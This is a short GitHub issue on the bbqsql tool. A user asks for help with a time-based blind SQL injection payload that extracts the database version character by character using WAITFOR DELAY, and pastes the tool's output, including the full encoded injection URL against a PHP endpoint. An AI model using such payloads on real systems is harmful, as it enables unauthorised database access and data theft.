Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

time problem #48

Open
HackXBack opened this issue Jun 8, 2014 · 0 comments
Open

time problem #48

HackXBack opened this issue Jun 8, 2014 · 0 comments

Comments

@HackXBack
Copy link

i need hep in time method
while i put this value in query
if(ASCII(SUBSTRING((SELECT @@Version LIMIT 1 OFFSET ${row_index}) , ${char_index} ,1))) ${comparator:>}ASCII(${char_val}) WAITFOR DELAY '0:0:0${sleep}'

but this didnt work it give true and bbqsql then stop
sure my value is not correct so what is the solution
this is the output before it stop

Injecting into 'url' parameter
It looks like this: http://www.x.com/y/z.php?action=get_new_price&id_pack=58&pack_page=1&productsAttribute[]=73231&products_exclude[]=1%20if%28ASCII%28SUBSTRING%28%28SELECT%20%40%40version%20LIMIT%201%20OFFSET%200%29%20%2C%201%20%2C1%29%29%29%20%3EASCII%28%29%20WAITFOR%20DELAY%20%270%5C%3A0%5C%3A0%27&qty=1&qtys[]=1
we will be treating this as a 'true' response
for the sample requests, the response's 'time' were the following :
[0.3397238254547119, 0.16059422492980957, 0.16398906707763672, 0.1356668472290039]

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Development

No branches or pull requests

1 participant